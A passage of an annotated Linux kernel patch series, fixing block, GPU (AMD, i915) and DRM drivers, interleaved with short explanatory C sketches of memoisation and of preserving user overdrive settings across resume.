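memoization: previously, a genuinely absent table meant a fresh lookup and
a fresh warning on every CPU hotplug. A stand-alone sketch of the pattern,
names invented:

#include <stdbool.h>
#include <stdio.h>

static const void *firmware_lookup(void)
{
	return NULL;			/* table absent on this system */
}

static const void *get_table(void)
{
	static const void *table;
	static bool checked;

	if (!table && !checked) {	/* at most one lookup, ever */
		table = firmware_lookup();
		if (!table)
			fprintf(stderr, "table missing (warned once)\n");
		checked = true;
	}
	return table;
}

int main(void)
{
	get_table();
	get_table();			/* no second lookup, no second warning */
	return 0;
}
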
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 1b35cbd029c7c..eabbc3bdec221 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1853,35 +1853,44 @@ static blk_status_t loop_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 
+ static void loop_handle_cmd(struct loop_cmd *cmd)
+ {
++	struct cgroup_subsys_state *cmd_blkcg_css = cmd->blkcg_css;
++	struct cgroup_subsys_state *cmd_memcg_css = cmd->memcg_css;
+ 	struct request *rq = blk_mq_rq_from_pdu(cmd);
+ 	const bool write = op_is_write(req_op(rq));
+ 	struct loop_device *lo = rq->q->queuedata;
+ 	int ret = 0;
+ 	struct mem_cgroup *old_memcg = NULL;
++	const bool use_aio = cmd->use_aio;
+ 
+ 	if (write && (lo->lo_flags & LO_FLAGS_READ_ONLY)) {
+ 		ret = -EIO;
+ 		goto failed;
+ 	}
+ 
+-	if (cmd->blkcg_css)
+-		kthread_associate_blkcg(cmd->blkcg_css);
+-	if (cmd->memcg_css)
++	if (cmd_blkcg_css)
++		kthread_associate_blkcg(cmd_blkcg_css);
++	if (cmd_memcg_css)
+ 		old_memcg = set_active_memcg(
+-			mem_cgroup_from_css(cmd->memcg_css));
++			mem_cgroup_from_css(cmd_memcg_css));
+ 
++	/*
++	 * do_req_filebacked() may call blk_mq_complete_request() synchronously
++	 * or asynchronously if using aio. Hence, do not touch 'cmd' after
++	 * do_req_filebacked() has returned unless we are sure that 'cmd' has
++	 * not yet been completed.
++	 */
+ 	ret = do_req_filebacked(lo, rq);
+ 
+-	if (cmd->blkcg_css)
++	if (cmd_blkcg_css)
+ 		kthread_associate_blkcg(NULL);
+ 
+-	if (cmd->memcg_css) {
++	if (cmd_memcg_css) {
+ 		set_active_memcg(old_memcg);
+-		css_put(cmd->memcg_css);
++		css_put(cmd_memcg_css);
+ 	}
+  failed:
+ 	/* complete non-aio request */
+-	if (!cmd->use_aio || ret) {
++	if (!use_aio || ret) {
+ 		if (ret == -EOPNOTSUPP)
+ 			cmd->ret = ret;
+ 		else
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 7d28e3aa406c2..a200aba02e436 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1413,8 +1413,7 @@ static inline void nullb_complete_cmd(struct nullb_cmd *cmd)
+ 	case NULL_IRQ_SOFTIRQ:
+ 		switch (cmd->nq->dev->queue_mode) {
+ 		case NULL_Q_MQ:
+-			if (likely(!blk_should_fake_timeout(cmd->rq->q)))
+-				blk_mq_complete_request(cmd->rq);
++			blk_mq_complete_request(cmd->rq);
+ 			break;
+ 		case NULL_Q_BIO:
+ 			/*
+@@ -1675,7 +1674,8 @@ static blk_status_t null_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 	cmd->rq = bd->rq;
+ 	cmd->error = BLK_STS_OK;
+ 	cmd->nq = nq;
+-	cmd->fake_timeout = should_timeout_request(bd->rq);
++	cmd->fake_timeout = should_timeout_request(bd->rq) ||
++		blk_should_fake_timeout(bd->rq->q);
+ 
+ 	blk_mq_start_request(bd->rq);
+ 
+diff --git a/drivers/block/sunvdc.c b/drivers/block/sunvdc.c
+index fb855da971ee7..9fa821fa76b07 100644
+--- a/drivers/block/sunvdc.c
++++ b/drivers/block/sunvdc.c
+@@ -972,6 +972,8 @@ static int vdc_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 	print_version();
+ 
+ 	hp = mdesc_grab();
++	if (!hp)
++		return -ENODEV;
+ 
+ 	err = -ENODEV;
+ 	if ((vdev->dev_no << PARTITION_SHIFT) & ~(u64)MINORMASK) {
+diff --git a/drivers/block/zram/zram_drv.c b/drivers/block/zram/zram_drv.c
+index e290d6d970474..03ef03e10618d 100644
+--- a/drivers/block/zram/zram_drv.c
++++ b/drivers/block/zram/zram_drv.c
+@@ -2108,9 +2108,9 @@ static int zram_rw_page(struct block_device *bdev, sector_t sector,
+ 	bv.bv_offset = 0;
+ 
+ 	start_time = bdev_start_io_acct(bdev->bd_disk->part0,
+-			SECTORS_PER_PAGE, op, jiffies);
++			op, jiffies);
+ 	ret = zram_bvec_rw(zram, &bv, index, offset, op, NULL);
+-	bdev_end_io_acct(bdev->bd_disk->part0, op, start_time);
++	bdev_end_io_acct(bdev->bd_disk->part0, op, SECTORS_PER_PAGE, start_time);
+ out:
+ 	/*
+ 	 * If I/O fails, just return error(ie, non-zero) without
+diff --git a/drivers/clk/Kconfig b/drivers/clk/Kconfig
+index d79905f3e1744..5da82f2bdd211 100644
+--- a/drivers/clk/Kconfig
++++ b/drivers/clk/Kconfig
+@@ -92,7 +92,7 @@ config COMMON_CLK_RK808
+ config COMMON_CLK_HI655X
+ 	tristate "Clock driver for Hi655x" if EXPERT
+ 	depends on (MFD_HI655X_PMIC || COMPILE_TEST)
+-	depends on REGMAP
++	select REGMAP
+ 	default MFD_HI655X_PMIC
+ 	help
+ 	  This driver supports the hi655x PMIC clock. This
+diff --git a/drivers/cpuidle/cpuidle-psci-domain.c b/drivers/cpuidle/cpuidle-psci-domain.c
+index c80cf9ddabd8a..1fca250d5dece 100644
+--- a/drivers/cpuidle/cpuidle-psci-domain.c
++++ b/drivers/cpuidle/cpuidle-psci-domain.c
+@@ -103,7 +103,8 @@ static void psci_pd_remove(void)
+ 	struct psci_pd_provider *pd_provider, *it;
+ 	struct generic_pm_domain *genpd;
+ 
+-	list_for_each_entry_safe(pd_provider, it, &psci_pd_providers, link) {
++	list_for_each_entry_safe_reverse(pd_provider, it,
++					 &psci_pd_providers, link) {
+ 		of_genpd_del_provider(pd_provider->node);
+ 
+ 		genpd = of_genpd_remove_last(pd_provider->node);
+diff --git a/drivers/firmware/xilinx/zynqmp.c b/drivers/firmware/xilinx/zynqmp.c
+index 129f68d7a6f53..17d1f49750944 100644
+--- a/drivers/firmware/xilinx/zynqmp.c
++++ b/drivers/firmware/xilinx/zynqmp.c
+@@ -206,7 +206,7 @@ static int do_feature_check_call(const u32 api_id)
+ 	}
+ 
+ 	/* Add new entry if not present */
+-	feature_data = kmalloc(sizeof(*feature_data), GFP_KERNEL);
++	feature_data = kmalloc(sizeof(*feature_data), GFP_ATOMIC);
+ 	if (!feature_data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index ba092072308fa..1b4105110f398 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1685,7 +1685,7 @@ static int psp_hdcp_initialize(struct psp_context *psp)
+ 	psp->hdcp_context.context.mem_context.shared_mem_size = PSP_HDCP_SHARED_MEM_SIZE;
+ 	psp->hdcp_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->hdcp_context.context.initialized) {
++	if (!psp->hdcp_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->hdcp_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1752,7 +1752,7 @@ static int psp_dtm_initialize(struct psp_context *psp)
+ 	psp->dtm_context.context.mem_context.shared_mem_size = PSP_DTM_SHARED_MEM_SIZE;
+ 	psp->dtm_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->dtm_context.context.initialized) {
++	if (!psp->dtm_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->dtm_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1820,7 +1820,7 @@ static int psp_rap_initialize(struct psp_context *psp)
+ 	psp->rap_context.context.mem_context.shared_mem_size = PSP_RAP_SHARED_MEM_SIZE;
+ 	psp->rap_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->rap_context.context.initialized) {
++	if (!psp->rap_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->rap_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index b1622ac9949ff..e1e0e7ee344c5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -26,6 +26,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/module.h>
++#include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/debugfs.h>
+ #include <drm/drm_drv.h>
+@@ -222,6 +223,24 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ 		return r;
+ 	}
+ 
++	/*
++	 * Some of the Steam Deck's BIOS versions are incompatible with the
++	 * indirect SRAM mode, leading to amdgpu being unable to get
++	 * properly probed (and even potentially crashing the kernel).
++	 * Hence, check for these versions here - notice this is
++	 * restricted to Vangogh (Deck's APU).
++	 */
++	if (adev->ip_versions[UVD_HWIP][0] == IP_VERSION(3, 0, 2)) {
++		const char *bios_ver = dmi_get_system_info(DMI_BIOS_VERSION);
++
++		if (bios_ver && (!strncmp("F7A0113", bios_ver, 7) ||
++		     !strncmp("F7A0114", bios_ver, 7))) {
++			adev->vcn.indirect_sram = false;
++			dev_info(adev->dev,
++				"Steam Deck quirk: indirect SRAM disabled on BIOS %s\n", bios_ver);
++		}
++	}
++
+ 	hdr = (const struct common_firmware_header *)adev->vcn.fw->data;
+ 	adev->vcn.fw_version = le32_to_cpu(hdr->ucode_version);
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device.c b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+index b8936340742b4..4dbf8dae3437b 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+@@ -59,6 +59,7 @@ static int kfd_gtt_sa_init(struct kfd_dev *kfd, unsigned int buf_size,
+ 				unsigned int chunk_size);
+ static void kfd_gtt_sa_fini(struct kfd_dev *kfd);
+ 
++static int kfd_resume_iommu(struct kfd_dev *kfd);
+ static int kfd_resume(struct kfd_dev *kfd);
+ 
+ static void kfd_device_info_set_sdma_info(struct kfd_dev *kfd)
+@@ -635,7 +636,7 @@ bool kgd2kfd_device_init(struct kfd_dev *kfd,
+ 
+ 	svm_migrate_init(kfd->adev);
+ 
+-	if (kgd2kfd_resume_iommu(kfd))
++	if (kfd_resume_iommu(kfd))
+ 		goto device_iommu_error;
+ 
+ 	if (kfd_resume(kfd))
+@@ -783,6 +784,14 @@ int kgd2kfd_resume(struct kfd_dev *kfd, bool run_pm)
+ }
+ 
+ int kgd2kfd_resume_iommu(struct kfd_dev *kfd)
++{
++	if (!kfd->init_complete)
++		return 0;
++
++	return kfd_resume_iommu(kfd);
++}
++
++static int kfd_resume_iommu(struct kfd_dev *kfd)
+ {
+ 	int err = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_events.c b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+index 729d26d648af3..2880ed96ac2e3 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_events.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+@@ -778,16 +778,13 @@ static struct kfd_event_waiter *alloc_event_waiters(uint32_t num_events)
+ 	struct kfd_event_waiter *event_waiters;
+ 	uint32_t i;
+ 
+-	event_waiters = kmalloc_array(num_events,
+-					sizeof(struct kfd_event_waiter),
+-					GFP_KERNEL);
++	event_waiters = kcalloc(num_events, sizeof(struct kfd_event_waiter),
++				GFP_KERNEL);
+ 	if (!event_waiters)
+ 		return NULL;
+ 
+-	for (i = 0; (event_waiters) && (i < num_events) ; i++) {
++	for (i = 0; i < num_events; i++)
+ 		init_wait(&event_waiters[i].wait);
+-		event_waiters[i].activated = false;
+-	}
+ 
+ 	return event_waiters;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 1ba8a2905f824..8661de32d80a5 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4985,9 +4985,9 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 
+ 		for (; flip_addrs->dirty_rect_count < num_clips; clips++)
+ 			fill_dc_dirty_rect(new_plane_state->plane,
+-					   &dirty_rects[i], clips->x1,
+-					   clips->y1, clips->x2 - clips->x1,
+-					   clips->y2 - clips->y1,
++					   &dirty_rects[flip_addrs->dirty_rect_count],
++					   clips->x1, clips->y1,
++					   clips->x2 - clips->x1, clips->y2 - clips->y1,
+ 					   &flip_addrs->dirty_rect_count,
+ 					   false);
+ 		return;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 8c50457112649..c20e9f76f0213 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -992,8 +992,5 @@ void dcn30_prepare_bandwidth(struct dc *dc,
+ 			dc->clk_mgr->funcs->set_max_memclk(dc->clk_mgr, dc->clk_mgr->bw_params->clk_table.entries[dc->clk_mgr->bw_params->clk_table.num_entries - 1].memclk_mhz);
+ 
+ 	dcn20_prepare_bandwidth(dc, context);
+-
+-	dc_dmub_srv_p_state_delegate(dc,
+-		context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching, context);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 9c532167ff466..252356a8160fa 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1915,6 +1915,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	bool subvp_in_use = false;
+ 	uint8_t is_pipe_split_expected[MAX_PIPES] = {0};
+ 	struct dc_crtc_timing *timing;
++	bool vsr_odm_support = false;
+ 
+ 	dcn20_populate_dml_pipes_from_context(dc, context, pipes, fast_validate);
+ 
+@@ -1932,12 +1933,15 @@ int dcn32_populate_dml_pipes_from_context(
+ 		timing = &pipe->stream->timing;
+ 
+ 		pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_dal;
++		vsr_odm_support = (res_ctx->pipe_ctx[i].stream->src.width >= 5120 &&
++				res_ctx->pipe_ctx[i].stream->src.width > res_ctx->pipe_ctx[i].stream->dst.width);
+ 		if (context->stream_count == 1 &&
+ 				context->stream_status[0].plane_count == 1 &&
+ 				!dc_is_hdmi_signal(res_ctx->pipe_ctx[i].stream->signal) &&
+ 				is_h_timing_divisible_by_2(res_ctx->pipe_ctx[i].stream) &&
+ 				pipe->stream->timing.pix_clk_100hz * 100 > DCN3_2_VMIN_DISPCLK_HZ &&
+-				dc->debug.enable_single_display_2to1_odm_policy) {
++				dc->debug.enable_single_display_2to1_odm_policy &&
++				!vsr_odm_support) { //excluding 2to1 ODM combine on >= 5k vsr
+ 			pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_2to1;
+ 		}
+ 		pipe_cnt++;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+index 379729b028474..c3d75e56410cc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+@@ -1802,7 +1802,10 @@ static unsigned int CalculateVMAndRowBytes(
+ 	}
+ 
+ 	if (SurfaceTiling == dm_sw_linear) {
+-		*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
++		if (PTEBufferSizeInRequests == 0)
++			*dpte_row_height = 1;
++		else
++			*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
+ 		*dpte_row_width_ub = (dml_ceil(((double) SwathWidth - 1) / *PixelPTEReqWidth, 1) + 1) * *PixelPTEReqWidth;
+ 		*PixelPTEBytesPerRow = *dpte_row_width_ub / *PixelPTEReqWidth * *PTERequestSize;
+ 	} else if (ScanDirection != dm_vert) {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+index f77401709d83c..2162ecd1057d1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+@@ -27,7 +27,7 @@
+ // *** IMPORTANT ***
+ // SMU TEAM: Always increment the interface version if
+ // any structure is changed in this file
+-#define PMFW_DRIVER_IF_VERSION 7
++#define PMFW_DRIVER_IF_VERSION 8
+ 
+ typedef struct {
+   int32_t value;
+@@ -198,7 +198,7 @@ typedef struct {
+   uint16_t SkinTemp;
+   uint16_t DeviceState;
+   uint16_t CurTemp;                     //[centi-Celsius]
+-  uint16_t spare2;
++  uint16_t FilterAlphaValue;
+ 
+   uint16_t AverageGfxclkFrequency;
+   uint16_t AverageFclkFrequency;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index 992163e66f7b4..bffa6247c3cda 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -29,7 +29,7 @@
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x37
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x37
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 697e98a0a20ab..75f18681e984c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2143,16 +2143,9 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 		(OverDriveTable_t *)smu->smu_table.boot_overdrive_table;
+ 	OverDriveTable_t *user_od_table =
+ 		(OverDriveTable_t *)smu->smu_table.user_overdrive_table;
++	OverDriveTable_t user_od_table_bak;
+ 	int ret = 0;
+ 
+-	/*
+-	 * For S3/S4/Runpm resume, no need to setup those overdrive tables again as
+-	 *   - either they already have the default OD settings got during cold bootup
+-	 *   - or they have some user customized OD settings which cannot be overwritten
+-	 */
+-	if (smu->adev->in_suspend)
+-		return 0;
+-
+ 	ret = smu_cmn_update_table(smu, SMU_TABLE_OVERDRIVE,
+ 				   0, (void *)boot_od_table, false);
+ 	if (ret) {
+@@ -2163,7 +2156,23 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 	sienna_cichlid_dump_od_table(smu, boot_od_table);
+ 
+ 	memcpy(od_table, boot_od_table, sizeof(OverDriveTable_t));
+-	memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++
++	/*
++	 * For S3/S4/Runpm resume, we need to setup those overdrive tables again,
++	 * but we have to preserve user defined values in "user_od_table".
++	 */
++	if (!smu->adev->in_suspend) {
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		smu->user_dpm_profile.user_od = false;
++	} else if (smu->user_dpm_profile.user_od) {
++		memcpy(&user_od_table_bak, user_od_table, sizeof(OverDriveTable_t));
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		user_od_table->GfxclkFmin = user_od_table_bak.GfxclkFmin;
++		user_od_table->GfxclkFmax = user_od_table_bak.GfxclkFmax;
++		user_od_table->UclkFmin = user_od_table_bak.UclkFmin;
++		user_od_table->UclkFmax = user_od_table_bak.UclkFmax;
++		user_od_table->VddGfxOffset = user_od_table_bak.VddGfxOffset;
++	}
+ 
+ 	return 0;
+ }
+@@ -2373,6 +2382,20 @@ static int sienna_cichlid_od_edit_dpm_table(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int sienna_cichlid_restore_user_od_settings(struct smu_context *smu)
++{
++	struct smu_table_context *table_context = &smu->smu_table;
++	OverDriveTable_t *od_table = table_context->overdrive_table;
++	OverDriveTable_t *user_od_table = table_context->user_overdrive_table;
++	int res;
++
++	res = smu_v11_0_restore_user_od_settings(smu);
++	if (res == 0)
++		memcpy(od_table, user_od_table, sizeof(OverDriveTable_t));
++
++	return res;
++}
++
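
The resume path now rebuilds the overdrive table from boot defaults but
carries the user's tunables across via a backup taken before the overwrite.
A rough sketch of that preserve-selected-fields pattern; the field names
are invented stand-ins for GfxclkFmin and friends:

#include <stdio.h>

struct od_table { int gfx_fmin, gfx_fmax, vdd_off; };

static void refresh_user_od(struct od_table *user,
			    const struct od_table *boot, int user_dirty)
{
	struct od_table bak = *user;	/* backup before the overwrite */

	*user = *boot;			/* start from pristine boot defaults */
	if (user_dirty) {		/* re-apply only user-owned fields */
		user->gfx_fmin = bak.gfx_fmin;
		user->gfx_fmax = bak.gfx_fmax;
		user->vdd_off = bak.vdd_off;
	}
}

int main(void)
{
	struct od_table boot = { 500, 2500, 0 };
	struct od_table user = { 700, 2400, -25 };

	refresh_user_od(&user, &boot, 1);
	printf("fmin=%d fmax=%d voff=%d\n",
	       user.gfx_fmin, user.gfx_fmax, user.vdd_off);
	return 0;
}
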
+ static int sienna_cichlid_run_btc(struct smu_context *smu)
+ {
+ 	int res;
+@@ -4400,7 +4423,7 @@ static const struct pptable_funcs sienna_cichlid_ppt_funcs = {
+ 	.set_soft_freq_limited_range = smu_v11_0_set_soft_freq_limited_range,
+ 	.set_default_od_settings = sienna_cichlid_set_default_od_settings,
+ 	.od_edit_dpm_table = sienna_cichlid_od_edit_dpm_table,
+-	.restore_user_od_settings = smu_v11_0_restore_user_od_settings,
++	.restore_user_od_settings = sienna_cichlid_restore_user_od_settings,
+ 	.run_btc = sienna_cichlid_run_btc,
+ 	.set_power_source = smu_v11_0_set_power_source,
+ 	.get_pp_feature_mask = smu_cmn_get_pp_feature_mask,
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index b94adb9bbefb8..0116c947a4b30 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -2797,7 +2797,7 @@ u32 drm_edid_get_panel_id(struct i2c_adapter *adapter)
+ 	 * the EDID then we'll just return 0.
+ 	 */
+ 
+-	base_block = kmalloc(EDID_LENGTH, GFP_KERNEL);
++	base_block = kzalloc(EDID_LENGTH, GFP_KERNEL);
+ 	if (!base_block)
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/drm_gem.c b/drivers/gpu/drm/drm_gem.c
+index b8db675e7fb5e..b0246a8480068 100644
+--- a/drivers/gpu/drm/drm_gem.c
++++ b/drivers/gpu/drm/drm_gem.c
+@@ -1375,10 +1375,13 @@ EXPORT_SYMBOL(drm_gem_lru_move_tail);
+  *
+  * @lru: The LRU to scan
+  * @nr_to_scan: The number of pages to try to reclaim
++ * @remaining: The number of pages left to reclaim, should be initialized by caller
+  * @shrink: Callback to try to shrink/reclaim the object.
+  */
+ unsigned long
+-drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++drm_gem_lru_scan(struct drm_gem_lru *lru,
++		 unsigned int nr_to_scan,
++		 unsigned long *remaining,
+ 		 bool (*shrink)(struct drm_gem_object *obj))
+ {
+ 	struct drm_gem_lru still_in_lru;
+@@ -1417,8 +1420,10 @@ drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
+ 		 * hit shrinker in response to trying to get backing pages
+ 		 * for this obj (ie. while it's lock is already held)
+ 		 */
+-		if (!dma_resv_trylock(obj->resv))
++		if (!dma_resv_trylock(obj->resv)) {
++			*remaining += obj->size >> PAGE_SHIFT;
+ 			goto tail;
++		}
+ 
+ 		if (shrink(obj)) {
+ 			freed += obj->size >> PAGE_SHIFT;
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index 7af9da886d4e5..5fdc608043e76 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -622,11 +622,14 @@ int drm_gem_shmem_mmap(struct drm_gem_shmem_object *shmem, struct vm_area_struct
+ 	int ret;
+ 
+ 	if (obj->import_attach) {
+-		/* Drop the reference drm_gem_mmap_obj() acquired.*/
+-		drm_gem_object_put(obj);
+ 		vma->vm_private_data = NULL;
++		ret = dma_buf_mmap(obj->dma_buf, vma, 0);
++
++		/* Drop the reference drm_gem_mmap_obj() acquired.*/
++		if (!ret)
++			drm_gem_object_put(obj);
+ 
+-		return dma_buf_mmap(obj->dma_buf, vma, 0);
++		return ret;
+ 	}
+ 
+ 	ret = drm_gem_shmem_get_pages(shmem);
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 1b6989001ee2b..af69521bd1e9b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -1618,6 +1618,8 @@ struct intel_psr {
+ 	bool psr2_sel_fetch_cff_enabled;
+ 	bool req_psr2_sdp_prior_scanline;
+ 	u8 sink_sync_latency;
++	u8 io_wake_lines;
++	u8 fast_wake_lines;
+ 	ktime_t last_entry_attempt;
+ 	ktime_t last_exit;
+ 	bool sink_not_reliable;
+diff --git a/drivers/gpu/drm/i915/display/intel_psr.c b/drivers/gpu/drm/i915/display/intel_psr.c
+index 5b678916e6db5..8b984c88fd8b1 100644
+--- a/drivers/gpu/drm/i915/display/intel_psr.c
++++ b/drivers/gpu/drm/i915/display/intel_psr.c
+@@ -543,6 +543,14 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 	val |= EDP_PSR2_FRAME_BEFORE_SU(max_t(u8, intel_dp->psr.sink_sync_latency + 1, 2));
+ 	val |= intel_psr2_get_tp_time(intel_dp);
+ 
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		if (intel_dp->psr.io_wake_lines < 9 &&
++		    intel_dp->psr.fast_wake_lines < 9)
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		else
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_3;
++	}
++
+ 	/* Wa_22012278275:adl-p */
+ 	if (IS_ADLP_DISPLAY_STEP(dev_priv, STEP_A0, STEP_E0)) {
+ 		static const u8 map[] = {
+@@ -559,31 +567,21 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 		 * Still using the default IO_BUFFER_WAKE and FAST_WAKE, see
+ 		 * comments bellow for more information
+ 		 */
+-		u32 tmp, lines = 7;
+-
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		u32 tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.io_wake_lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_IO_BUFFER_WAKE_SHIFT;
+ 		val |= tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.fast_wake_lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_FAST_WAKE_MIN_SHIFT;
+ 		val |= tmp;
+ 	} else if (DISPLAY_VER(dev_priv) >= 12) {
+-		/*
+-		 * TODO: 7 lines of IO_BUFFER_WAKE and FAST_WAKE are default
+-		 * values from BSpec. In order to setting an optimal power
+-		 * consumption, lower than 4k resolution mode needs to decrease
+-		 * IO_BUFFER_WAKE and FAST_WAKE. And higher than 4K resolution
